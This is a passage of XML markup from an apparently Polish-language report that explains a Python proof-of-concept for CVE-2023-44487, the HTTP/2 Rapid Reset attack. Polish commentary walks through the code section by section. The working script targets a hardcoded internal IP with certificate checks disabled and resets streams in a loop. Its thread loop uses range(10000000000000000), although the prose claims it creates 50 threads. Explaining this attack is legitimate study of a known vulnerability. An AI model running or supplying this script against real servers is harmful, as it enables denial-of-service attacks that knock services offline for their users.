    <w:p w14:paraId="4331219B" w14:textId="0455C2E6" w:rsidR="007D738D" w:rsidRDefault="007D738D" w:rsidP="007D738D">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Plik </w:t>
      </w:r>
      <w:r w:rsidR="006043A3">
        <w:t>main.py</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A511D00" w14:textId="4D49D9FD" w:rsidR="006043A3" w:rsidRDefault="006043A3" w:rsidP="00E03455">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Poniższy kod napisany w Pythonie tworzy 50 wątków, z których każdy nawiązuje połączenie z serwerem HTTP/2, wysyła żadanie GET, a następnie natychmiast resetuje strumień. Jest to przykład symulujący atak typu Denial of Service (DoS) poprzez szybkie resetowanie wielu strumieni HTTP/2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB766B4" w14:textId="7A1721EA" w:rsidR="006043A3" w:rsidRDefault="006043A3" w:rsidP="006043A3">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Importowanie niezbędnych modułów</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709401FF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import threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791D85F9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import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA9A8D9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import collections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BF95BB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</w:p>
    <w:p w14:paraId="37DFD504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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FBC921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# using Python 3.10+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765FC62F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from collections.abc import MutableSet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5342F90D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collections.MutableSet = collections.abc.MutableSet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B594ADA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from collections.abc import MutableMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9972F3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collections.MutableMapping = collections.abc.MutableMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DBA162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except ImportError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCADC8E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# using Python 3.10-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7C1704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from collections import MutableSet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8BCFCA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from collections import MutableMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAF6254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 xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355C2A93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from h2.connection import H2Connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDA1F32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from h2.events import RequestReceived, StreamReset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EB9A2D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lastRenderedPageBreak/>
        <w:t>from h2.config import H2Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E86A876" w14:textId="77777777" w:rsidR="006043A3" w:rsidRPr="006043A3" w:rsidRDefault="006043A3" w:rsidP="006043A3">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006043A3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import ssl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E576B31" w14:textId="5EF970DC" w:rsidR="006043A3" w:rsidRDefault="006043A3" w:rsidP="006043A3">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      </w:pPr>
      <w:r w:rsidRPr="006043A3">
        <w:t>from h2.errors import ErrorCodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9CE24D" w14:textId="43C68DD1" w:rsidR="006043A3" w:rsidRDefault="006043A3" w:rsidP="006043A3"/>
    <w:p w14:paraId="076A9254" w14:textId="0CCB4113" w:rsidR="006043A3" w:rsidRDefault="006043A3" w:rsidP="006043A3">
      <w:r>
        <w:t>Ten segment importuje wszystkie niezbędne moduły, w tym ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>threading</w:t>
      </w:r>
      <w:r>
        <w:t>’ do obłusgi wątków, ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r>
        <w:t>’ do komunikacji sieciowej, ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>collections</w:t>
      </w:r>
      <w:r>
        <w:t>’ do manipulacji strukturami danych, ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ssl</w:t>
      </w:r>
      <w:r>
        <w:t>’ do obsługi TLS oraz moduły ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>h2</w:t>
      </w:r>
      <w:r>
        <w:t>’ do pracy z protokołem HTTP/2. Dodatkowo fragment ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:t>’ i ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>except</w:t>
      </w:r>
      <w:r>
        <w:t>’ zapewniają kompatybilność kodu z różnymi wersjami Pythona.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598F0F3A" w14:textId="2105DE5D" w:rsidR="006043A3" w:rsidRDefault="009E55A1" w:rsidP="006043A3">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Definicja funkcji ‘root_function’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C1BB9F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>def root_function(url='10.26.41.134'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B479C4E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while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25441223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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F788C3A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# Create a TCP connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA859CD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sock = socket.create_connection((url, 443))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B89C0F2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</w:p>
    <w:p w14:paraId="1EBBFBF4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# Wrap the socket for TLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBD72D1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ctx = ssl.create_default_context()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEA9816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ctx.check_hostname = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D96DDE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ctx.verify_mode = ssl.CERT_NONE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7458AA72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ctx.set_alpn_protocols(['h2'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088FDE97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sock = ctx.wrap_socket(sock, server_hostname=url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125AEE0C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</w:p>
    <w:p w14:paraId="456AF5C3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# Make sure we're using HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3363048B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assert sock.selected_alpn_protocol() == 'h2'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B22601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</w:p>
    <w:p w14:paraId="6568E893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# Create HTTP/2 connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AF451E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config = H2Configuration(client_side=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FB5116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conn = H2Connection(config=config)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6293E2" w14:textId="77777777" w:rsidR="009E55A1" w:rsidRP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conn.initiate_connection()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB95287" w14:textId="76D0053D" w:rsidR="009E55A1" w:rsidRDefault="009E55A1" w:rsidP="009E55A1">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E55A1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            sock.sendall(conn.data_to_send())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654151D3" w14:textId="77777777" w:rsidR="009E55A1" w:rsidRDefault="009E55A1" w:rsidP="009E55A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F68CD96" w14:textId="36C30778" w:rsidR="009E55A1" w:rsidRDefault="004011E4" w:rsidP="009E55A1">
      <w:r w:rsidRPr="004011E4">
        <w:t>Funkcja ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root_function</w:t>
      </w:r>
      <w:r>
        <w:t>’ najpierw tworzy połączenie TCP z serwerem na porcie 443. Następnie owija to połączenie w warstwę TLS za pomocą kontekstu SSL, aby zapewnić bezpieczną komunikację. Protokół HTTP/2 jest negocjowany za pomocą ALPN (Application-Layer Protocol Negotiation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB36596" w14:textId="0357954D" w:rsidR="004011E4" w:rsidRDefault="004011E4" w:rsidP="004011E4">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Inicjalizacja strumienia HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D78E5F" w14:textId="77777777" w:rsidR="004011E4" w:rsidRDefault="004011E4" w:rsidP="004011E4">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6488597B" w14:textId="7E1C1AE7" w:rsidR="004011E4" w:rsidRPr="004011E4" w:rsidRDefault="004011E4" w:rsidP="004011E4">
      <w:r w:rsidRPr="004011E4">
        <w:t>Ten segment inicjalizuje nowy s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">trumień HTTP/2, wysyła nagłówki HTTP/2 z żądaniem GET, a następnie odbiera dane z serwera. Gdy strumień otrzymuje odpowiedź, jest natychmiast resetowany za pomocą ramki </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RESET_STREAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> z kodem błędu ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ErrorCodes.CANCEL</w:t>
      </w:r>
      <w:r>
        <w:t>’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C245602" w14:textId="77777777" w:rsidR="004011E4" w:rsidRPr="004011E4" w:rsidRDefault="004011E4" w:rsidP="004011E4">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="727166F5" w14:textId="77777777" w:rsidR="004011E4" w:rsidRPr="004011E4" w:rsidRDefault="004011E4" w:rsidP="004011E4">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08946BCD" w14:textId="77777777" w:rsidR="004011E4" w:rsidRPr="004011E4" w:rsidRDefault="004011E4" w:rsidP="004011E4">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10014238" w14:textId="77777777" w:rsidR="004011E4" w:rsidRPr="004011E4" w:rsidRDefault="004011E4" w:rsidP="004011E4">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="530733A7" w14:textId="77777777" w:rsidR="004011E4" w:rsidRPr="004011E4" w:rsidRDefault="004011E4" w:rsidP="004011E4">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="293F2C0F" w14:textId="77777777" w:rsidR="004011E4" w:rsidRPr="004011E4" w:rsidRDefault="004011E4" w:rsidP="004011E4">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04EA05E2" w14:textId="77777777" w:rsidR="004011E4" w:rsidRPr="004011E4" w:rsidRDefault="004011E4" w:rsidP="004011E4">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E39B983" w14:textId="77777777" w:rsidR="004011E4" w:rsidRPr="004011E4" w:rsidRDefault="004011E4" w:rsidP="004011E4">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45F11634" w14:textId="77777777" w:rsidR="004011E4" w:rsidRPr="004011E4" w:rsidRDefault="004011E4" w:rsidP="004011E4">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1667FBFD" w14:textId="478EA231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># Create a new stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3AE6D6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stream_id = conn.get_next_available_stream_id()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B675FD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conn.send_headers(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D92103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stream_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D4291C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[(':method', 'GET'), (':authority', url), (':path', '/'), (':scheme', 'https')],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3039F9C7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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3022A2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sock.sendall(conn.data_to_send())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AD6470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</w:p>
    <w:p w14:paraId="56F2F062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# Read some data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FCB552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while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C4DCD6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data = sock.recv(65535)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5058D39C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if not data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABAE7A7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    break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F55E5A8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</w:p>
    <w:p w14:paraId="4D583EC3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events = conn.receive_data(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6CABDC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for event in events:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D09FBC6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    if isinstance(event, RequestReceived):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630CC780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4011E4">
        <w:rPr>
          <w:color w:val="ADADAD" w:themeColor="background2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                        # Cancel the stream with error code for CANCEL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4E5AE7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        conn.reset_stream(event.stream_id, error_code=ErrorCodes.CANCEL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65025537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    elif isinstance(event, StreamReset):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258BFE37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        print(f"Stream {event.stream_id} cancelled.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A458A7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</w:p>
    <w:p w14:paraId="69E9BBE2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    sock.sendall(conn.data_to_send())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D9B64D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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085FB925" w14:textId="4CEDB204" w:rsid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        print(f"An error occurred: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2EC265" w14:textId="77777777" w:rsidR="004011E4" w:rsidRDefault="004011E4" w:rsidP="004011E4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FDB05A5" w14:textId="77777777" w:rsidR="004011E4" w:rsidRDefault="004011E4" w:rsidP="004011E4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="213FCF67" w14:textId="566608F3" w:rsidR="004011E4" w:rsidRDefault="004011E4" w:rsidP="004011E4">
      <w:pPr>
        <w:pStyle w:val="Nagwek3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Tworzenie i uruchamianie wątków</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E795E3F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4011E4">
        <w:rPr>
          <w:color w:val="ADADAD" w:themeColor="background2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Create 50 threads running root_function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31215E72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>threads = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68310C4C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>for i in range(10000000000000000):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB1AFBD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thread = threading.Thread(target=root_function)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AFCC04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thread.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E326D92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 xml:space="preserve">    threads.append(thread)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA27C1D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</w:p>
    <w:p w14:paraId="47804AF6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4011E4">
        <w:rPr>
          <w:color w:val="ADADAD" w:themeColor="background2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Keep the main thread alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC8A4E6" w14:textId="77777777" w:rsidR="004011E4" w:rsidRPr="004011E4" w:rsidRDefault="004011E4" w:rsidP="004011E4">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004011E4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for thread in threads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72015F4E" w14:textId="5919644E" w:rsidR="004011E4" w:rsidRPr="004011E4" w:rsidRDefault="004011E4" w:rsidP="004011E4">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      </w:pPr>
      <w:r w:rsidRPr="004011E4">
        <w:t xml:space="preserve">    thread.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A803EE1" w14:textId="77777777" w:rsidR="004011E4" w:rsidRPr="004011E4" w:rsidRDefault="004011E4" w:rsidP="004011E4"/>
    <w:p w14:paraId="75E47996" w14:textId="6EA436E2" w:rsidR="004011E4" w:rsidRPr="004011E4" w:rsidRDefault="004011E4" w:rsidP="004011E4">
      <w:r w:rsidRPr="004011E4">
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>en segment tworzy 50 wątków, z których każdy uruchamia ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root_function</w:t>
      </w:r>
      <w:r>
        <w:t>’. Wątki są dodawane do listy ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>threads</w:t>
      </w:r>
      <w:r>
        <w:t>’, a następnie ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>join()</w:t>
      </w:r>
      <w:r>
        <w:t>’ jest wywoływane na każdym wątku, aby upewnić się, że główny wątek pozostaje aktywny, dopóki wszystkie wątki nie zakończą pracy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E357B66" w14:textId="478E0A1B" w:rsidR="005335ED" w:rsidRDefault="005335ED" w:rsidP="005335ED">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Działanie </w:t>
      </w:r>
      <w:r w:rsidR="00AF1AEC">
        <w:t>podatności</w:t>
      </w:r>
      <w:r w:rsidR="00DC73CD">
        <w:t xml:space="preserve"> CVE-2023-44487</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750208C2" w14:textId="77777777" w:rsidR="00812475" w:rsidRDefault="00812475" w:rsidP="00812475"/>
    <w:p w14:paraId="5187C138" w14:textId="7B9514AE" w:rsidR="00AF1AEC" w:rsidRDefault="00DC73CD" w:rsidP="00812475">
      <w:r>
        <w:t>Poniżej przedstawiono szczegółowy opis działania podatności HTTP/2 Rapid Reset Attack, na przykładzie implementacji w serwerze Nginx.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499807C1" w14:textId="5CABFF6B" w:rsidR="00DC73CD" w:rsidRDefault="00DC73CD" w:rsidP="00DC73CD">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nawiązanie połączenia TCP i TLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6632EF" w14:textId="4633736E" w:rsidR="00DC73CD" w:rsidRPr="00DC73CD" w:rsidRDefault="00DC73CD" w:rsidP="00DC73CD">
      <w:r>
        <w:t>Atakujący nawiązuje połączenie TCP z serwerem na porcie 443 (typowym dla HTTPS). Następnie połączenie to jest owinięte w warstwę TLS, aby zapewnić bezpieczną komunikację.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2FF31D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# Create a TCP connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568E946C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sock = socket.create_connection((url, 443))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E0DADC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</w:p>
    <w:p w14:paraId="6B390BC7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# Wrap the socket for TLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0685B3AD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ctx = ssl.create_default_context()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524ABA5B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ctx.check_hostname = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DC0BFA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ctx.verify_mode = ssl.CERT_NONE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC44445" w14:textId="77777777" w:rsidR="00DC73CD" w:rsidRPr="00DC73CD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ctx.set_alpn_protocols(['h2'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0CE8C3" w14:textId="577BEBB9" w:rsidR="00AF1AEC" w:rsidRDefault="00DC73CD" w:rsidP="00DC73CD">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC73CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sock = ctx.wrap_socket(sock, server_hostname=url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05442EF2" w14:textId="77777777" w:rsidR="00DC73CD" w:rsidRDefault="00DC73CD" w:rsidP="00DC73CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D804ACF" w14:textId="1FAB1310" w:rsidR="00DC73CD" w:rsidRDefault="00DC73CD" w:rsidP="00DC73CD">
      <w:r w:rsidRPr="00DC73CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>create_connection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC73CD">
        <w:t xml:space="preserve"> Tworzy połączenie TCP z serw</w:t>
      </w:r>
      <w:r>
        <w:t>erem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0474EAA1" w14:textId="0913FD09" w:rsidR="00DC73CD" w:rsidRDefault="00DC73CD" w:rsidP="00DC73CD">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">wrap_socket: </w:t>
      </w:r>
      <w:r>
        <w:t>Owijanie połączenia w warstwę TLS z ALPN ustawionym na HTTP/2 (‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>h2</w:t>
      </w:r>
      <w:r>
        <w:t>’).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C0467E" w14:textId="77777777" w:rsidR="00DC73CD" w:rsidRDefault="00DC73CD" w:rsidP="00DC73CD">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="313FC7ED" w14:textId="3CD8F2DF" w:rsidR="00DC73CD" w:rsidRDefault="00DC73CD" w:rsidP="00DC73CD">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Negocjacja protokołu HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C10879" w14:textId="3F56E418" w:rsidR="00872E84" w:rsidRPr="00DC73CD" w:rsidRDefault="00872E84" w:rsidP="00DC73CD">
      <w:r>
        <w:t>Po nawiązaniu połączenia TLS, klient i serwer negocjują użycie protokołu HTTP/2. ALPN jest używane do ustalenia, że komunikacją będzie odbywać się za pomocą HTTP/2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17354E12" w14:textId="77777777" w:rsidR="00872E84" w:rsidRPr="00872E84" w:rsidRDefault="00872E84" w:rsidP="00872E84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872E84">
        <w:rPr>
          <w:color w:val="ADADAD" w:themeColor="background2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Make sure we're using HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369E1791" w14:textId="7300D291" w:rsidR="00DC73CD" w:rsidRDefault="00872E84" w:rsidP="00872E84">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      </w:pPr>
      <w:r w:rsidRPr="00872E84">
        <w:t>assert sock.selected_alpn_protocol() == 'h2'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A321ADE" w14:textId="77777777" w:rsidR="00872E84" w:rsidRDefault="00872E84" w:rsidP="00872E84"/>
    <w:p w14:paraId="34CF0042" w14:textId="11845220" w:rsidR="00872E84" w:rsidRDefault="00872E84" w:rsidP="00872E84">
      <w:r w:rsidRPr="00872E84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">selected_alpn_protocol() </w:t>
      </w:r>
      <w:r w:rsidRPr="00872E84">
        <w:t>– sprawdza, czy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> negocjowany protokół to HTTP/2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A29EB4E" w14:textId="406F2AD1" w:rsidR="00872E84" w:rsidRDefault="00872E84" w:rsidP="00872E84">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Inicjalizacja połączenia HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C536AF" w14:textId="65289711" w:rsidR="00872E84" w:rsidRDefault="00872E84" w:rsidP="00872E84">
      <w:r>
        <w:t>Klient inicjalizuje połączenie HTTP/2 poprzez wysyłanie ramki inicjującej.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744B26C4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2F7C5E">
        <w:rPr>
          <w:color w:val="ADADAD" w:themeColor="background2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Create HTTP/2 connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021B29F6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config = H2Configuration(client_side=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6725867A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conn = H2Connection(config=config)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A4D46F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conn.initiate_connection()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CEFDD6" w14:textId="3F767633" w:rsidR="00872E84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sock.sendall(conn.data_to_send())</w:t>
      </w:r>
    </w:p>
